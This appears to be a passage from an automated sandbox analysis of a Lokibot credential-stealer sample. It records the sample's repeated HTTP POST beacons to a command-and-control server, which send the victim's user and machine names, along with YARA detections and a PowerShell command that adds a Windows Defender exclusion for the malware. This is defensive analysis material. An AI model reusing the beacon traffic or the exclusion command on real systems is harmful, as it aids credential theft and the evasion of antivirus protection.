                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:39.676688910 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:04:39.676700115 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        43192.168.2.849764104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:39.826894999 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:39.833420992 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:42.108746052 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:40 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:42.108766079 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:04:42.108783007 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        44192.168.2.849765104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:42.262300968 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:42.267991066 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:44.657943964 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:42 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:44.658031940 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:04:44.658044100 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:04:44.658056021 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        45192.168.2.849766104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:44.813699961 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:44.823781967 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:47.124341011 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:45 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:47.124361038 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:04:47.124373913 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:04:47.124387026 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        46192.168.2.849767104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:47.290076971 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:47.295064926 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:49.551826000 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:47 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:49.551848888 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:04:49.551867008 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:06:02:41
                        Start date:29/08/2024
                        Path:C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\PO-0Y9005373R664.exe"
                        Imagebase:0x6c0000
                        File size:606'216 bytes
                        MD5 hash:8C71713FD5663BCBE87118FC47DE3EC5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1758190593.0000000005500000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1684307388.00000000006C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1745375841.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low
                        Has exited:true

                        Target ID:3
                        Start time:06:02:46
                        Start date:29/08/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe"
                        Imagebase:0x100000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:06:02:46
                        Start date:29/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6ee680000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:06:02:47
                        Start date:29/08/2024
